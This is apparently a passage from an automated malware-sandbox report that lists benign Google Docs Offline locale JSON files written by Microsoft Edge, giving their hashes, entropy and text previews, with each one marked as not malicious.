                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):911
Entropy (8bit):4.6294343834070935
Encrypted:false
SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:false
Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):939
Entropy (8bit):4.451724169062555
Encrypted:false
SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:FCEA43D62605860FFF41BE26BAD80169
SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:false
Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):977
Entropy (8bit):4.622066056638277
Encrypted:false
SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:false
Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):972
Entropy (8bit):4.621319511196614
Encrypted:false
SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:6CAC04BDCC09034981B4AB567B00C296
SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:false
Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):990
Entropy (8bit):4.497202347098541
Encrypted:false
SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1658
Entropy (8bit):4.294833932445159
Encrypted:false
SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:BC7E1D09028B085B74CB4E04D8A90814
SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:false
Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):935
